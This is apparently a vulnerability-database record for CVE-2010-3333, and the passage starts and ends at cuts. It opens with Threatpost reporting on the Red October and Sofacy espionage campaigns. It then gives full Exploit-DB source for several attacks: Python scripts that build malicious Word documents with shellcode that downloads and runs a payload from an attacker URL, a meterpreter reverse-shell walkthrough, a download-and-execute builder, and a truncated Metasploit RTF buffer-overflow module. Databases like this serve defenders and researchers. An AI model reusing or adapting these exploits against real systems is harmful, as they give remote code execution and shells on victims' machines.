The attackers are using these persistent tasks to continually log keystrokes, record screenshots, retrieve email messages from Outlook or execute malicious payloads embedded in any of the Office-document exploits used to establish backdoor communication with the C&C servers.\n\nUnique among the persistent modules are those that are related to USB drives and mobile devices.\n\nFor example, one module will search and extract files and deleted files from a USB drive once it is connected to a compromised machine. Deleted files are restored and exfiltrated. Another module waits for an iPhone or Nokia smartphone to connect to the machine, then grabs device information, including contact information, call history, SMS messages, calendars and more. There is also a Windows Mobile module, which once one of those devices connects, infects the phone with a mobile version of the malware.\n\nThe campaign also targets documents with the acid* extension, which Kaspersky said refers to the classified Acid Cryptofiler software used by the European Union and NATO.\n\n\u201cThere is an incredible amount of functionality here that is new,\u201d Baumgartner said. \u201cIt\u2019s unusual to see it all in one campaign.\u201d\n\nSome of the one-time tasks include: collecting device hardware and software specs; filesystem and network share information; collecting information on installed software, including Oracle Database, messaging software and drivers and software for mobile devices and USB drives; extraction of browsing history from all leading browsers, saved passwords for websites, mail and IM accounts, Windows account hashes, and Outlook account information. 
Others include the ability to download files from FTP servers reachable from the infected machine, writing and executing code from the attacker, doing network scans and dumping configuration data from Cisco devices, and doing a network scan for other computers on the network vulnerable to the same exploit used by [Conficker (MS08-067)](<http://technet.microsoft.com/en-us/security/bulletin/ms08-067>).\n\nIn all there are nine module groups discovered in this campaign: reconnaissance; password or credential harvesting; email; USB drive; keyboard; persistence; propagation; mobile; and data exfiltration.\n\nKaspersky was alerted to the Red October campaign by a partner reporting a spear-phishing campaign. Four exploits have been used in the attack, one targeting [CVE-2009-3129](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3129>) using a malicious Microsoft Excel document, two others are Word docs exploiting [CVE-2010-3333](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333>) or [CVE-2012-0158](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158>). The fourth is a Java exploit discovered by researchers at Seculert. All of the Office exploits were used in previous attacks against Tibetan activists and military and energy targets in Asia, Kaspersky said.\n\nMost of the 60 C&C domains are in Russia and Germany while the victims are worldwide with most of the IP addresses connecting from Switzerland, Kazakhstan, Greece and Belarus. The attacks have not been attributed as of yet. A heat map of the attacks showed victims across the globe, but none in China, leading to speculation the Chinese could be behind the campaign. 
But Kaspersky researcher Costin Raiu cautioned today on the [Digital Underground podcast](<https://threatpost.com/costin-raiu-red-october-cyberespionage-campaign-011713/>) that because the company was able to sinkhole only six domains, they may not be seeing the complete infection picture.\n\nThe campaign, meanwhile, may be shutting down, Raiu said, adding that the infrastructure is being taken off line with registrars killing the 60 domains and hosting companies killing the C&C servers.\n", "modified": "2013-05-10T14:15:16", "published": "2013-01-17T19:20:06", "id": "THREATPOST:C0872257AF615C3542B0C9F0BAE4A57D", "href": "https://threatpost.com/inside-1000-red-october-cyberespionage-malware-modules-011713/77419/", "type": "threatpost", "title": "Inside the 1,000 Red October Cyberespionage Malware Modules", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:59", "bulletinFamily": "info", "cvelist": ["CVE-2010-3333", "CVE-2011-2140", "CVE-2012-0158", "CVE-2012-1856", "CVE-2014-6352", "CVE-2015-2375", "CVE-2015-2376", "CVE-2015-2377", "CVE-2015-2424", "CVE-2015-5119"], "description": "A new analysis of the Sofacy APT gang, a Russian-speaking group carrying out targeted attacks against military and government offices for close to a decade, shows a relentless wave of intrusions peaking this summer against victims in a number of NATO countries and the Ukraine.\n\nResearchers at Kaspersky Lab this morning [released their update on Sofacy](<https://securelist.com/blog/research/72924/sofacy-apt-hits-high-profile-targets-with-updated-toolset/>), which is also known as APT28, Fancy Bear, Sednit and a handful of other monikers. The report demonstrates a barrage of zero-day vulnerabilities in Office, Java, Adobe and Windows at the group\u2019s disposal; the zero-days are being used against targets in attacks that remained active as of last month. 
The gang\u2019s malware implants were uncovered as well as its capabilities to quickly adapt to detection technologies and hit compromised machines with different backdoors so that in case one was found out, there would be fallbacks.\n\nSofacy\u2019s roots go back to around 2007, Kaspersky researchers said, with the name coming from an implant used in attacks four years ago that shared some similarities with the [Miniduke APT](<https://threatpost.com/miniduke-espionage-malware-hits-governments-europe-using-adobe-exploits-022713/77569/>) gang uncovered by Kaspersky Lab in 2013 executing espionage activity against governments in Europe.\n\nSofacy\u2019s rapid capability expansion began in 2013 when a number of new backdoors and malware tools were discovered, including CORESHELL, JHUHUGIT and AZZY among others.\n\nThis summer, the AZZY implant got a facelift and was used as recently as October along with a new USB-stealing malware designed to hit air-gapped machines.\n\nIn July, researchers at iSight Partners reported that Sofacy, or Tsar Team as iSight calls them, had dropped their [sixth zero day exploit in four months](<https://threatpost.com/office-java-patches-erase-latest-apt-28-zero-days/113825/>), two of which in Office and Java were patched during a span of a few days in July.\n\n\u201cUsually, when someone publishes research on a given cyber-espionage group, the group reacts: either it halts its activity or dramatically changes tactics and strategy. With Sofacy, this is not always the case. We have seen it launching attacks for several years now, and its activity has been reported by the security community multiple times,\u201d said Costin Raiu, director of the Global Research and Analysis Team at Kaspersky Lab.\n\nFive of the six zero days, iSight said, were built in-house by APT 28, while the sixth, CVE-2015-5119, was a repurposed Flash 0day that was put into use 24 hours after it was uncovered after the Hacking Team breach. 
Given the underground value of unpatched and unreported vulnerabilities, this was highly unusual behavior, even for a state-sponsored cyberespionage team.\n\nKaspersky researchers said they discovered the group was using a Flash and Java zero day to drop the JHUHUGIT malware implant, which became its most prevalent first-stage implant in subsequent attacks.\n\nThe updated AZZY Trojan, meanwhile, surfaced in August in attacks against higher-profile victims, including, in one case, a defense contractor, Kaspersky researchers said. While the first sample was spotted on July 29 and signatures quickly added to security systems, Kaspersky researchers said that by Aug. 4, another sample was in the wild. What made the AZZY update stand out was that it was not delivered via a zero-day; instead it was delivered and installed by separate malware already on the system, a dropper called msdeltemp.dll that the attackers controlled via backdoors in order to send commands to infected machines.\n\n\u201cThis code modification marks an unusual departure from the typical AZZY backdoors, with its C&C communication functions moved to an external DLL file,\u201d Kaspersky researchers wrote in their report. 
\u201cIn the past, the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry, instead of storing it in the malware itself, so this code modularization follows the same line of thinking.\u201d\n\nIn addition to traditional data-stealing capabilities, Sofacy also covets information stored on air-gapped machines and uses its USBSTEALER implant to drain these machines of valuable content.\n\nThis is behavior similar to that of the Equation group, one of the most sophisticated state-sponsored groups, which invested significant resources in developing more than 100 malware implants, each with their own purpose and used selectively against valuable targets.\n\n\u201cIn 2015 its activity increased significantly, deploying no less than five 0-days, making Sofacy one of the most prolific, agile and dynamic threat actors in the arena,\u201d Raiu said. \u201cWe have reasons to believe that these attacks will continue.\u201d\n", "modified": "2015-12-04T21:35:34", "published": "2015-12-04T07:05:37", "id": "THREATPOST:23B92BF326746339F6B36D64AEB2D5F6", "href": "https://threatpost.com/relentless-sofacy-apt-attacks-armed-with-zero-days-new-backdoors/115556/", "type": "threatpost", "title": "Sofacy APT28 Gang Using New Backdoors, Zero Days", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-01T09:17:23", "description": "Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka \"RTF Stack Buffer Overflow Vulnerability.\"\r Output .doc\r Url download and execute\r CVE2010-3333\r MS10-087\r Detected output\r PoC : https://www.youtube.com/watch?v=crTxxigt0u0&list=UUkv21RQpnb8Cfhj0ExhV61Q&feature=c4-overview#### Usage Info\nPoC : 
https://www.youtube.com/watch?v=crTxxigt0u0&list=UUkv21RQpnb8Cfhj0ExhV61Q&feature=c4-overview\n\nThis is private exploit. You can buy it at https://0day.today", "edition": 2, "published": "2014-01-30T00:00:00", "type": "zdt", "title": "Office 2003 SP3, Office 2007 SP2, Office 2011 Stack-based buffer overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2014-01-30T00:00:00", "id": "1337DAY-ID-21830", "href": "https://0day.today/exploit/description/21830", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "exploitdb": [{"lastseen": "2016-02-02T09:32:25", "description": "Microsoft Office 2003 Home/Pro - Code Execution (0day). CVE-2010-3333. Local exploit for windows platform", "published": "2012-01-08T00:00:00", "type": "exploitdb", "title": "Microsoft Office 2003 Home/Pro - Code Execution 0day", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2012-01-08T00:00:00", "id": "EDB-ID:18334", "href": "https://www.exploit-db.com/exploits/18334/", "sourceData": "#!/usr/bin/python\r\n\r\n#\r\n# Note from the Exploit-DB team: This might be the same bug as:\r\n# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb\r\n#\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #\r\n# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #\r\n#####################################################################################\r\n# One shellcode to rule them all, One shellcode to find them, One shellcode to #\r\n# bring them all and in the darkness bind them!! 
#\r\n# #\r\n# Greetings: offsec, corelan, setoolkit #\r\n#####################################################################################\r\n# (1) root@bt:~/Desktop/office# ./office2003.py #\r\n# root@bt:~/Desktop/office# mv evil.doc /var/www/ #\r\n# #\r\n# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #\r\n# > /var/www/magic.exe #\r\n# #\r\n# (3) msf exploit(handler) > exploit #\r\n# #\r\n# [*] Started reverse handler on 192.168.111.132:9988 #\r\n# [*] Starting the payload handler... #\r\n# [*] Sending stage (752128 bytes) to 192.168.111.128 #\r\n# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#\r\n# at 2012-01-08 18:46:26 +0800 #\r\n# #\r\n# meterpreter > ipconfig #\r\n# #\r\n# MS TCP Loopback interface #\r\n# Hardware MAC: 00:00:00:00:00:00 #\r\n# IP Address : 127.0.0.1 #\r\n# Netmask : 255.0.0.0 #\r\n# #\r\n# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #\r\n# Hardware MAC: 00:0c:29:6c:92:42 #\r\n# IP Address : 192.168.111.128 #\r\n# Netmask : 255.255.255.0 #\r\n#-----------------------------------------------------------------------------------#\r\n\r\nimport binascii\r\n\r\nfilename = \"evil.doc\"\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# File Structure #\r\n#-----------------------------------------------------------------------------------#\r\nfile = (\r\n\"{\\\\rt##{\\shp{\\sp}}{\\shp{\\sp}}{\\shp{\\sp}}{\\shp{\\*\\shpinst\\shpfhdr0\\shpbxcolumn\\s\"\r\n\"hpbypara\\sh pwr2}{\\sp{\\sn {}{}{\\sn}{\\sn}{\\*\\*}pFragments}{\\*\\*\\*}{\\sv{\\*\\*\\*\\*\\*\"\r\n\"\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*\\*}9;2;ffffffffff\")\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# Open raw socket to download payload to parent directory as \"a.exe\" #\r\n# ==> cmd execute \"a.exe\" 
#\r\n#-----------------------------------------------------------------------------------#\r\nmagic = (\r\n\"\\x65\\x62\\x37\\x37\\x33\\x31\\x63\\x39\\x36\\x34\\x38\\x62\\x37\\x31\\x33\\x30\"\r\n\"\\x38\\x62\\x37\\x36\\x30\\x63\\x38\\x62\\x37\\x36\\x31\\x63\\x38\\x62\\x35\\x65\"\r\n\"\\x30\\x38\\x38\\x62\\x37\\x65\\x32\\x30\\x38\\x62\\x33\\x36\\x36\\x36\\x33\\x39\"\r\n\"\\x34\\x66\\x31\\x38\\x37\\x35\\x66\\x32\\x63\\x33\\x36\\x30\\x38\\x62\\x36\\x63\"\r\n\"\\x32\\x34\\x32\\x34\\x38\\x62\\x34\\x35\\x33\\x63\\x38\\x62\\x35\\x34\\x30\\x35\"\r\n\"\\x37\\x38\\x30\\x31\\x65\\x61\\x38\\x62\\x34\\x61\\x31\\x38\\x38\\x62\\x35\\x61\"\r\n\"\\x32\\x30\\x30\\x31\\x65\\x62\\x65\\x33\\x33\\x34\\x34\\x39\\x38\\x62\\x33\\x34\"\r\n\"\\x38\\x62\\x30\\x31\\x65\\x65\\x33\\x31\\x66\\x66\\x33\\x31\\x63\\x30\\x66\\x63\"\r\n\"\\x61\\x63\\x38\\x34\\x63\\x30\\x37\\x34\\x30\\x37\\x63\\x31\\x63\\x66\\x30\\x64\"\r\n\"\\x30\\x31\\x63\\x37\\x65\\x62\\x66\\x34\\x33\\x62\\x37\\x63\\x32\\x34\\x32\\x38\"\r\n\"\\x37\\x35\\x65\\x31\\x38\\x62\\x35\\x61\\x32\\x34\\x30\\x31\\x65\\x62\\x36\\x36\"\r\n\"\\x38\\x62\\x30\\x63\\x34\\x62\\x38\\x62\\x35\\x61\\x31\\x63\\x30\\x31\\x65\\x62\"\r\n\"\\x38\\x62\\x30\\x34\\x38\\x62\\x30\\x31\\x65\\x38\\x38\\x39\\x34\\x34\\x32\\x34\"\r\n\"\\x31\\x63\\x36\\x31\\x63\\x33\\x65\\x38\\x39\\x32\\x66\\x66\\x66\\x66\\x66\\x66\"\r\n\"\\x35\\x66\\x38\\x31\\x65\\x66\\x39\\x38\\x66\\x66\\x66\\x66\\x66\\x66\\x65\\x62\"\r\n\"\\x30\\x35\\x65\\x38\\x65\\x64\\x66\\x66\\x66\\x66\\x66\\x66\\x36\\x38\\x38\\x65\"\r\n\"\\x34\\x65\\x30\\x65\\x65\\x63\\x35\\x33\\x65\\x38\\x39\\x34\\x66\\x66\\x66\\x66\"\r\n\"\\x66\\x66\\x33\\x31\\x63\\x39\\x36\\x36\\x62\\x39\\x36\\x66\\x36\\x65\\x35\\x31\"\r\n\"\\x36\\x38\\x37\\x35\\x37\\x32\\x36\\x63\\x36\\x64\\x35\\x34\\x66\\x66\\x64\\x30\"\r\n\"\\x36\\x38\\x33\\x36\\x31\\x61\\x32\\x66\\x37\\x30\\x35\\x30\\x65\\x38\\x37\\x61\"\r\n\"\\x66\\x66\\x66\\x66\\x66\\x66\\x33\\x31\\x63\\x39\\x35\\x31\\x35\\x31\\x38\\x64\"\r\n\"\\x33\\x37\\x38\\x31\\x63\\x36\\x65\\x65\\x
66\\x66\\x66\\x66\\x66\\x66\\x38\\x64\"\r\n\"\\x35\\x36\\x30\\x63\\x35\\x32\\x35\\x37\\x35\\x31\\x66\\x66\\x64\\x30\\x36\\x38\"\r\n\"\\x39\\x38\\x66\\x65\\x38\\x61\\x30\\x65\\x35\\x33\\x65\\x38\\x35\\x62\\x66\\x66\"\r\n\"\\x66\\x66\\x66\\x66\\x34\\x31\\x35\\x31\\x35\\x36\\x66\\x66\\x64\\x30\\x36\\x38\"\r\n\"\\x37\\x65\\x64\\x38\\x65\\x32\\x37\\x33\\x35\\x33\\x65\\x38\\x34\\x62\\x66\\x66\"\r\n\"\\x66\\x66\\x66\\x66\\x66\\x66\\x64\\x30\\x36\\x33\\x36\\x64\\x36\\x34\\x32\\x65\"\r\n\"\\x36\\x35\\x37\\x38\\x36\\x35\\x32\\x30\\x32\\x66\\x36\\x33\\x32\\x30\\x32\\x30\"\r\n\"\\x36\\x31\\x32\\x65\\x36\\x35\\x37\\x38\\x36\\x35\\x30\\x30\")\r\n\r\n#------------------------------------------------------------------------------------------------------------------------------#\r\n# Two versions of office 2003 floating around: #\r\n# (1) Standalone version, (2) XP Service Pack upgrade #\r\n################################################################################################################################\r\n# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... 
#\r\n# #\r\n# (1) 0x30324366 - CALL ESP - WINWORD.exe => \"\\x36\\x36\\x34\\x33\\x33\\x32\\x33\\x30\" #\r\n# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #\r\n# #\r\n# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => \"\\x35\\x35\\x32\\x36\\x34\\x30\\x33\\x30\" #\r\n# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #\r\n#------------------------------------------------------------------------------------------------------------------------------#\r\n\r\nEIP = \"\\x36\\x36\\x34\\x33\\x33\\x32\\x33\\x30\" #should ascii convert the Little Endian pointer\r\n\r\nfiller = \"\\x30\\x30\\x30\\x30\\x38\\x30\\x37\\x63\"*2 + \"\\x41\"*24 + \"\\x39\\x30\"*18\r\n\r\nbuffer = \"\\x23\"*501 + \"\\x30\\x35\" + \"\\x30\"*40 + EIP + filler + magic\r\n\r\n#-----------------------------------------------------------------------------------#\r\n# Since we are downloading our payload from a remote webserver there are no #\r\n# restrictions on payload size or badcharacters... #\r\n#-----------------------------------------------------------------------------------#\r\n\r\nURL = \"http://192.168.111.132/magic.exe\"\r\nbinnu = binascii.b2a_hex(URL)\r\n\r\nURL2 = \"00\"\r\nnxt=\"{}}}}}}\"\r\nnxt+=\"\\x0d\\x0a\"\r\nnxt+=\"}\"\r\n\r\ntextfile = open(filename , 'w')\r\ntextfile.write(file+buffer+binnu+URL2+nxt)\r\ntextfile.close()", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/18334/"}, {"lastseen": "2016-02-02T23:28:25", "description": "Microsoft Office 2010 Download Execute. CVE-2010-3333. 
Remote exploit for windows platform", "published": "2013-02-20T00:00:00", "type": "exploitdb", "title": "Microsoft Office 2010 Download Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2013-02-20T00:00:00", "id": "EDB-ID:24526", "href": "https://www.exploit-db.com/exploits/24526/", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: MS Office 2010 Download Execute\r\n# Google Dork: NA\r\n# Date: 19 Feb 2013\r\n# Exploit Author: g11tch\r\n# Vendor Homepage:\r\n# Software Link:\r\n# Version: ALL \r\n# Tested on: [Windows XP SP1, SP2, Windows 7 ]\r\n# CVE :\r\n##########\r\n#Just generate a meterpreter .exe, then provide the link to it via the exploit, it will automagically download and run said .exe\r\n\r\nimport binascii\r\nimport sys\r\nimport time\r\n\r\nprint \"Microsoft Office 2010, download -N- execute \"\r\nprint \" What do you want to name your .doc ? \"\r\nprint \" Example: TotallyTrusted.doc \"\r\nfilename = raw_input()\r\n\r\nprint \" What is the link to your .exe ? \"\r\nprint \"HINT!!:: Feed me a url. ie: http://super/eleet/payload.exe \"\r\n\r\nurl = raw_input()\r\n\r\nprint \"Gears and Cranks working mag1c in the background \"\r\ntime.sleep(3)\r\nclose=\"{}}}}}\"\r\nbinme=binascii.b2a_hex(url)\r\nfile=('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\\n')\r\ntextfile = open(filename , 'w')\r\ntextfile.write(file.decode('base64')+binme+close)\r\ntextfile.close()\r\ntime.sleep(3)\r\nprint \"enjoy\"\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/24526/"}, {"lastseen": "2016-02-02T06:16:03", "description": "Microsoft Word RTF pFragments Stack Buffer Overflow (File Format). CVE-2010-3333. 
Local exploit for windows platform", "published": "2011-03-04T00:00:00", "type": "exploitdb", "title": "Microsoft Word RTF pFragments Stack Buffer Overflow File Format", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-3333"], "modified": "2011-03-04T00:00:00", "id": "EDB-ID:16686", "href": "https://www.exploit-db.com/exploits/16686/", "sourceData": "##\r\n# $Id: ms10_087_rtf_pfragments_bof.rb 11875 2011-03-04 08:39:48Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\tinclude Msf::Exploit::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack-based buffer overflow in the handling of the\r\n\t\t\t\t'pFragments' shape property within the Microsoft Word RTF parser. All versions\r\n\t\t\t\tof Microsoft Office 2010, 2007, 2003, and XP prior to the release of the\r\n\t\t\t\tMS10-087 bulletin are vulnerable.\r\n\r\n\t\t\t\tThis module does not attempt to exploit the vulnerability via Microsoft Outlook.\r\n\r\n\t\t\t\tThe Microsoft Word RTF parser was only used by default in versions of Microsoft\r\n\t\t\t\tWord itself prior to Office 2007. With the release of Office 2007, Microsoft\r\n\t\t\t\tbegan using the Word RTF parser, by default, to handle rich-text messages within\r\n\t\t\t\tOutlook as well. It was possible to configure Outlook 2003 and earlier to use\r\n\t\t\t\tthe Microsoft Word engine too, but it was not a default setting.\r\n\r\n\t\t\t\tIt appears as though Microsoft Office 2000 is not vulnerable. 
It is unlikely that\r\n\t\t\t\tMicrosoft will confirm or deny this since Office 2000 has reached its support\r\n\t\t\t\tcycle end-of-life.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'wushi of team509', # original discovery\r\n\t\t\t\t\t'unknown', # exploit found in the wild\r\n\t\t\t\t\t'jduck', # Metasploit module\r\n\t\t\t\t\t'DJ Manila Ice, Vesh, CA' # more office 2007 for the lulz\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 11875 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-3333' ],\r\n\t\t\t\t\t[ 'OSVDB', '69085' ],\r\n\t\t\t\t\t[ 'MSB', 'MS10-087' ],\r\n\t\t\t\t\t[ 'BID', '44652' ],\r\n\t\t\t\t\t[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 512,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true # no need\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# This automatic target will combine all targets into one file :)\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\r\n\t\t\t\t\t# Office v10.6854.6845, winword.exe v10.0.6854.0\r\n\t\t\t\t\t[ 'Microsoft Office 2002 SP3 English on Windows XP SP3 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 23532, 45944 ],\r\n\t\t\t\t\t\t\t#'Ret' => 0x30002491 # p/p/r in winword.exe v10.0.6854.0\r\n\t\t\t\t\t\t\t'Ret' => 0x30002309 # p/p/r in winword.exe v10.0.6866.0\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# Office v11.8307.8324, winword.exe v11.0.8307.0\r\n\t\t\t\t\t# Office v11.8328.8221, winword.exe v11.0.8328.0\r\n\t\t\t\t\t[ 'Microsoft Office 2003 SP3 English on Windows XP SP3 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 24580, 51156 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x30001bdd # p/p/r in winword.exe\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t# In 
order to exploit this bug on Office 2007, a SafeSEH bypass method is needed.\r\n\r\n\t\t\t\t\t# Office v12.0.6425.1000, winword.exe v12.0.6425.1000\r\n\t\t\t\t\t[ 'Microsoft Office 2007 SP0 English on Windows XP SP3 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 5956 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x00290b0b # call ptr to ebp + 30, hits the next record\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Microsoft Office 2007 SP0 English on Windows Vista SP0 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 5956 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\t\t\t\t\t[ 'Microsoft Office 2007 SP0 English on Windows 7 SP0 English',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 5956 ],\r\n\t\t\t\t\t\t\t'Ret' => 0x78812890 # p/p/r in msxml5.dll which wasn't opted into SafeSEH. say word.\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\r\n\r\n\t\t\t\t\t# crash on a deref path to heaven.\r\n\t\t\t\t\t[ 'Crash Target for Debugging',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offsets' => [ 65535 ],\r\n\t\t\t\t\t\t\t'Ret' => 0xdac0ffee\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Nov 09 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOptString.new('FILENAME', [ true, 'The file name.', 'msf.rtf']),\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef add_target(rest, targ)\r\n\t\ttarg['Offsets'].each { |off|\r\n\t\t\tseh = generate_seh_record(targ.ret)\r\n\t\t\trest[off, seh.length] = seh\r\n\t\t\tdistance = off + seh.length\r\n\t\t\tjmp_back = Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\t\t\trest[off + seh.length, jmp_back.length] = jmp_back\r\n\t\t}\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\t# Prepare a sample SEH frame and backward jmp for length calculations\r\n\t\tseh = generate_seh_record(0xdeadbeef)\r\n\t\tjmp_back = 
Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-0xffff\").encode_string\r\n\r\n\t\t# RTF property Array parameters\r\n\t\tel_size = sz_rand()\r\n\t\tel_count = sz_rand()\r\n\r\n\t\tdata = ''\r\n\t\t# These words are presumably incorrectly used\r\n\t\t# assert(amount1 <= amount2)\r\n\t\tdata << [0x1111].pack('v') * 2\r\n\t\tdata << [0xc8ac].pack('v')\r\n\r\n\t\t# Filler\r\n\t\tif target.name =~ /Debug/i\r\n\t\t\trest = Rex::Text.pattern_create(0x10000 + seh.length + jmp_back.length)\r\n\t\telse\r\n\t\t\tlen = 51200 + rand(1000)\r\n\t\t\trest = rand_text(len + seh.length + jmp_back.length)\r\n\t\t\trest[0, payload.encoded.length] = payload.encoded\r\n\t\tend\r\n\r\n\t\t# Stick fake SEH frames here and there ;)\r\n\t\tif target.name == \"Automatic\"\r\n\t\t\ttargets.each { |t|\r\n\t\t\t\tnext if t.name !~ /Windows/i\r\n\r\n\t\t\t\tadd_target(rest, t)\r\n\t\t\t}\r\n\t\telse\r\n\t\t\tadd_target(rest, target)\r\n\t\tend\r\n\r\n\t\t# Craft the array for the property value\r\n\t\tsploit = \"%d;%d;\" % [el_size, el_count]\r\n\t\tsploit << data.unpack('H*').first\r\n\t\tsploit << rest.unpack('H*').first\r\n\r\n\t\t# Assemble it all into a nice RTF\r\n\t\tcontent = \"{\\\\rtf1\"\r\n\t\tcontent << \"{\\\\shp\" # shape\r\n\t\tcontent << \"{\\\\sp\" # shape property\r\n\t\tcontent << \"{\\\\sn pFragments}\" # property name\r\n\t\tcontent << \"{\\\\sv #{sploit}}\" # property value\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\t\tcontent << \"}\"\r\n\r\n\t\tprint_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n\t\tfile_create(content)\r\n\r\n\tend\r\n\r\n\tdef sz_rand\r\n\t\tbad_sizes = [ 0, 2, 4, 8 ]\r\n\t\tx = rand(9)\r\n\t\twhile bad_sizes.include? 
